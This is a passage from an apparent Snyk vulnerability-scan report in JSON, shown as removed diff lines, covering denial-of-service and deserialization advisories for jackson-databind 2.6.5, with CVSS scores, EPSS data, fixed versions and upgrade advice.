Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.8.11" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 